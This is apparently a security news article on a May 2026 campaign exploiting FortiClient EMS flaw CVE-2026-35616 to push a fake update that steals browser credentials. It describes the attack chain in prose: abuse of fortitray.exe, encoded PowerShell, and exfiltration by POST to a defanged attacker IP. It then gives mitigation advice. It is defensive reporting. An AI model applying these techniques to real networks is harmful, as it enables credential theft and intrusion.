Cybersecurity researchers have warned that threat actors are actively exploiting a critical vulnerability in Fortinet’s FortiClient Endpoint Management Server (EMS) to deploy dangerous credential-stealing malware on managed devices.
The attackers are abusing trusted enterprise management systems to distribute malware that appears to be a legitimate Fortinet software update. Security experts say the campaign allows cybercriminals to silently infect multiple devices within an organization using the company’s own endpoint management infrastructure.
The vulnerability, tracked as CVE-2026-35616, has a critical CVSS score of 9.1. According to cybersecurity company Arctic Wolf, the flaw is a pre-authentication API access bypass vulnerability that can lead to privilege escalation.
Fortinet has already released patches for the issue in FortiClient EMS version 7.4.7 and later. However, organizations that have not updated their systems remain vulnerable to attacks.
Cybersecurity experts observed the malicious campaign in May 2026. Attackers exploited the flaw to gain unauthorized access to FortiClient EMS environments and modify endpoint management settings.
Researchers said the attackers used FortiClient’s own management capabilities to execute malicious PowerShell commands across managed endpoints. Because the commands were delivered through a trusted enterprise management system, the activity appeared similar to legitimate administrative operations.
Arctic Wolf explained that once the attackers gained access to EMS management functionality, every connected endpoint became a potential target. This eliminated the need to compromise devices individually.
The threat actors also changed several EMS configurations to avoid detection. These modifications included delaying firmware upgrade reminders and altering Remote Access Profile settings. They additionally modified endpoint policies to insert malicious scripts that would run automatically on managed devices.
This technique allowed the attackers to quietly spread malware across enterprise environments while blending in with normal system management activities.
One of the most dangerous aspects of the campaign is the use of a fake update executable named “FortiEndpoint_Patch.exe.” The file pretends to be an official Fortinet endpoint update, but it is actually a previously undocumented Windows information stealer.
The malware is capable of stealing a wide range of sensitive information from infected systems, including:
- Saved passwords
- Browser cookies
- Autofill information
- Credit card details
- Stored addresses
- Phone numbers
Researchers said the malware targets both Chromium-based browsers, such as Google Chrome and Microsoft Edge, and Gecko-based browsers like Mozilla Firefox.
The stolen data is collected and stored in log files within the Windows ProgramData directory before being transmitted to attacker-controlled infrastructure.
The attack also abuses a legitimate FortiClient executable called “fortitray.exe.” Attackers used this trusted file to launch a malicious .cmd script through Windows cmd.exe.
The .cmd script then executed a Base64-encoded PowerShell command designed to download and run the credential-stealing payload.
After collecting sensitive information from the victim’s device, the PowerShell script sent the data to an attacker-controlled IP address, identified as 83.138.53[.]110, using an HTTP POST request.
Interestingly, researchers noted that the information-stealing malware itself does not contain built-in network exfiltration functionality. Instead, the PowerShell script handles the communication with the attacker’s infrastructure.
This modular approach helps the attackers remain stealthy and avoid detection by traditional security tools.
Security experts warn that the stolen credentials and session cookies could give attackers access to additional enterprise systems and cloud services.
In some cases, attackers may even bypass multi-factor authentication (MFA) protections by reusing stolen session cookies. This could allow unauthorized access to internal applications, email accounts, SaaS platforms, and other sensitive business resources.
Arctic Wolf stated that the attack demonstrates how dangerous it can be when attackers compromise centralized management platforms.
By exploiting the FortiClient EMS vulnerability, cybercriminals gained the ability to distribute malicious scripts to all managed endpoints from a single location. This significantly increased the scale and impact of the attack.
Cybersecurity teams are strongly advised to immediately update FortiClient EMS installations to version 7.4.7 or newer to close the vulnerability.
Organizations should also:
- Review EMS configuration changes for suspicious activity
- Monitor PowerShell execution logs
- Inspect endpoint policies for unauthorized scripts
- Hunt for indicators of compromise linked to the campaign
- Reset credentials and invalidate session cookies if compromise is suspected
- Enable advanced endpoint detection and response solutions
Security teams should pay special attention to unusual use of legitimate administrative tools, as attackers increasingly rely on trusted software and living-off-the-land techniques to avoid detection.
The FortiClient EMS attacks highlight a growing cybersecurity trend where threat actors target enterprise management systems to maximize the reach of their malware campaigns.
Instead of compromising individual endpoints one by one, attackers focus on centralized management servers that already have trusted access to thousands of devices inside corporate networks.
This strategy allows cybercriminals to deploy malware quickly, efficiently, and with a lower chance of being detected.
As cyber threats continue to evolve, organizations must ensure that critical infrastructure platforms are regularly patched, monitored, and secured against unauthorized access.
Failing to apply security updates in time can leave businesses exposed to devastating credential theft attacks and large-scale network compromise.
Interesting Article : CVE-2026-48172, Severe LiteSpeed cPanel Plugin Flaw Under Active Attack